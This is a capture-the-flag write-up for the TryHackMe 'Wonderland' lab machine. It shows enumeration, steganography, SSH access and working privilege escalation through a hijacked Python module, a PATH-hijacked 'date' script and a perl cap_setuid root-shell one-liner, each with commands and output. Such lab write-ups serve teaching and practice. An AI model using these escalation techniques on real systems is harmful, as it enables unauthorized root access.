Info
Name: Wonderland
Difficulty: Medium
Released: Fri 05 Jun 2020
Creator: NinjaJc01
URL: https://tryhackme.com/room/wonderland
Enumeration
As always we start with a nmap scan of the machine:
nmap -sC -sV -oA nmap/all-tcp 10.10.167.35
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-05 23:56 CEST
Nmap scan report for 10.10.167.35
Host is up (0.046s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 8e:ee:fb:96:ce:ad:70:dd:05:a9:3b:0d:b0:71:b8:63 (RSA)
| 256 7a:92:79:44:16:4f:20:43:50:a9:a8:47:e2:c2:be:84 (ECDSA)
|_ 256 00:0b:80:44:e6:3d:4b:69:47:92:2c:55:14:7e:2a:c9 (ED25519)
80/tcp open http Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
|_http-title: Follow the white rabbit.
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
We only have two ports open: 22 and 80.
Visiting the web server reveals the following page:
We also do a directory scan with ffuf
and find the following directories:
ffuf -u http://10.10.167.35/FUZZ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/big.txt
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.1.0-git
________________________________________________
:: Method : GET
:: URL : http://10.10.167.35/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/SecLists/Discovery/Web-Content/big.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403
________________________________________________
img [Status: 301, Size: 0, Words: 1, Lines: 1]
poem [Status: 301, Size: 0, Words: 1, Lines: 1]
r [Status: 301, Size: 0, Words: 1, Lines: 1]
:: Progress: [20473/20473] :: Job [1/1] :: 853 req/sec :: Duration: [0:00:24] :: Errors: 0 ::
After looking at the different directories I didn't find anything of interest, so I decided to download the first image we found and see if something was hidden in it.
wget http://10.10.167.35/img/white_rabbit_1.jpg
--2020-06-06 00:04:02-- http://10.10.167.35/img/white_rabbit_1.jpg
Connecting to 10.10.167.35:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1993438 (1.9M) [image/jpeg]
Saving to: ‘white_rabbit_1.jpg’
white_rabbit_1.jpg 100%[==============================================================>] 1.90M 4.57MB/s in 0.4s
2020-06-06 00:04:02 (4.57 MB/s) - ‘white_rabbit_1.jpg’ saved [1993438/1993438]
steghide extract -sf white_rabbit_1.jpg
Enter passphrase:
wrote extracted data to "hint.txt".
s1gh@kali:~/TryHackMe/Wonderland/files$ cat hint.txt
follow the r a b b i t
My immiediate thought was that r a b b i t
was that this might be pointing to an URL:
Looking at the source reveals something that looks like credentials:
We can now use the credentials above and SSH into the box.
Initial Foothold
We now have access to the machine, but by doing a ls -la
we notice something something weird. The root.txt
file is located in our users directory...
ls -la
total 40
drwxr-xr-x 5 alice alice 4096 May 25 17:52 .
drwxr-xr-x 6 root root 4096 May 25 17:52 ..
lrwxrwxrwx 1 root root 9 May 25 17:52 .bash_history -> /dev/null
-rw-r--r-- 1 alice alice 220 May 25 02:36 .bash_logout
-rw-r--r-- 1 alice alice 3771 May 25 02:36 .bashrc
drwx------ 2 alice alice 4096 May 25 16:37 .cache
drwx------ 3 alice alice 4096 May 25 16:37 .gnupg
drwxrwxr-x 3 alice alice 4096 May 25 02:52 .local
-rw-r--r-- 1 alice alice 807 May 25 02:36 .profile
-rw------- 1 root root 66 May 25 17:08 root.txt
-rw-r--r-- 1 root root 3577 May 25 02:43 walrus_and_the_carpenter.py
After a bit of thinkering (and looking at the hint) we try to cat /root/user.txt
.
cat /root/user.txt
thm{FLAG-REDACTED}
We finally have the user flag! Now, let's priv esc to root.
Privilege Escalation
Looking at our privileges with sudo -l
reveals the following:
sudo -l
[sudo] password for alice:
Matching Defaults entries for alice on wonderland:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User alice may run the following commands on wonderland:
(rabbit) /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py
We can run sudo /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py
as the user rabbit
.
Even though we only have read access to walrus_and_the_carpenter.py
and can't edit the file, let's see what the file is doing when executed.
import random
poem = """The sun was shining on the sea,
Shining with all his might:
He did his very best to make
The billows smooth and bright —
And this was odd, because it was
The middle of the night.
The moon was shining sulkily,
Because she thought the sun
Had got no business to be there
After the day was done —
"It’s very rude of him," she said,
"To come and spoil the fun!"
The sea was wet as wet could be,
The sands were dry as dry.
You could not see a cloud, because
No cloud was in the sky:
No birds were flying over head —
There were no birds to fly.
The Walrus and the Carpenter
Were walking close at hand;
They wept like anything to see
Such quantities of sand:
"If this were only cleared away,"
They said, "it would be grand!"
[...]
for i in range(10):
line = random.choice(poem.split("\n"))
Do to the length of the file, I've removed some of the poem that's printed to the screen when we're executing the file.
At the top of the file, we can see that the python module random
is imported.
So, what if we create a file named random.py
in our current working directory that executes /bin/bash
? That way our python file should be loaded instead of the "real" random
module, and in turn give us a shell as the rabbit
user.
Our random.py
:
import os
os.system("/bin/bash")
Executing the python script:
alice@wonderland:~$ sudo -u rabbit /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py
rabbit@wonderland:~$ whoami
rabbit
Awesome! We have escalated our privileges to the rabbit
user.
Looking in /home/rabbit/
we find a setuid binary, and by examining the file we see that date
is executed without specifying an absolute path:
Welcome to the tea party!
The Mad Hatter will be here soon.
/bin/echo -n 'Probably by ' && date --date='next hour' -R
Ask very nicely, and I will give you some tea while you wait for him
Segmentation fault (core dumped)
We can abuse this by exporting our own $PATH, writing a small script called date
and running the setuid binary.
Exporting our own $PATH:
rabbit@wonderland:/home/rabbit$ export PATH=/tmp:$PATH
rabbit@wonderland:/home/rabbit$ echo $PATH
/tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
Now, everytime a program is called without specifying an absolute path, our shell will first look in /tmp
.
Creating our malicious date file
We now create a shell script called date
, place that in /tmp
and make it executable with chmod +x /tmp/date
.
rabbit@wonderland:/home/rabbit$ cat /tmp/date
#!/bin/bash
/bin/bash
All we now need to do is run the setuid binary and we should escalate to the user hatter
.
rabbit@wonderland:/home/rabbit$ ./teaParty
Welcome to the tea party!
The Mad Hatter will be here soon.
Probably by hatter@wonderland:/home/rabbit$
hatter@wonderland:/home/rabbit$ whoami;id
hatter
uid=1003(hatter) gid=1002(rabbit) groups=1002(rabbit)
Awesome! We're getting close.
Looking in the home directory of the user hatter
reveals a password in cleartext. Trying to ssh in with this password gives us a full shell as the user hatter
:
ssh hatter@10.10.167.35
hatter@10.10.167.35's password:
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-101-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Fri Jun 5 22:48:04 UTC 2020
System load: 0.07 Processes: 95
Usage of /: 19.4% of 19.56GB Users logged in: 1
Memory usage: 32% IP address for eth0: 10.10.167.35
Swap usage: 0%
0 packages can be updated.
0 updates are security updates.
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Fri Jun 5 22:47:57 2020 from 10.11.4.205
hatter@wonderland:~$ whoami;id
hatter
uid=1003(hatter) gid=1003(hatter) groups=1003(hatter)
Doing some basic enumeration reveals that perl
have the following capability set: cap_setuid+ep
hatter@wonderland:/home/rabbit$ getcap -r / 2>/dev/null
/usr/bin/perl5.26.1 = cap_setuid+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/bin/perl = cap_setuid+ep
We can easily abuse this and escalate to root!
hatter@wonderland:~$ perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'
# whoami;id
root
uid=0(root) gid=1003(hatter) groups=1003(hatter)
We can now finally get the root.txt
flag as well!
# cat /home/alice/root.txt
thm{FLAG-REDACTED}